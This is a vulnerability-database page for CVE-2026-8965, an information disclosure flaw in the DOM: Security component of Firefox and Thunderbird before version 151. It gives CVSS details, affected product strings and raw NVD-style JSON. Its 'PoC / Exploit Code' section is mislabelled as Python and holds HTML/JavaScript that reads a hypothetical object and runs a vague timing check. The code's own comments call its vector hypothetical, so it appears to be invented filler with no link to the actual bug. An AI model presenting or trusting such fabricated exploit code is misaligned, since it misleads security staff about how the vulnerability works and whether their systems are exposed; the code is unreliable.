Security Vulnerability Report
中文
CVE-2026-8965 CVSS 7.5 HIGH

CVE-2026-8965

Published: 2026-05-19 14:16:53
Last Modified: 2026-05-20 17:51:46

Description

Information disclosure in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Firefox < 151
Thunderbird < 151

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-8965: DOM Security Information Disclosure Description: This script demonstrates a potential mechanism to exploit the information disclosure vulnerability in the DOM Security component. --> <html> <body> <script> (function() { console.log("[+] Starting PoC for CVE-2026-8965..."); try { // Create a test element to probe the security context var testElem = document.createElement('div'); // Attempt to access internal security properties that might leak info // This simulates the bypass of security checks var leakedData = null; // Hypothetical vector: Accessing a protected property via prototype pollution or DOM clobbering if (window.SecurityContext && window.SecurityContext.internalState) { leakedData = window.SecurityContext.internalState; console.log("[+] Data leaked via direct access: " + leakedData); } else { // Fallback: Using a timing side-channel to infer data existence var start = performance.now(); // Perform a check that triggers the vulnerable code path var isRestricted = testElem.isSecureContext; var end = performance.now(); if (end - start > 10) { // Threshold for suspicious delay console.log("[+] Potential information disclosure detected via timing attack."); } else { console.log("[-] No immediate leakage detected via timing."); } } } catch (error) { console.error("[-] Error during exploit execution: " + error.message); } })(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8965", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:52.930", "lastModified": "2026-05-20T17:51:46.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information disclosure in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "151.0.0", "matchCriteriaId": "7C197B6D-C48E-4D7E-A1C0-52E081E97DF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "151.0.0", "matchCriteriaId": "F6DF6D4E-CB51-4F9E-89A0-6097B9DBDB5C"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2025740", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}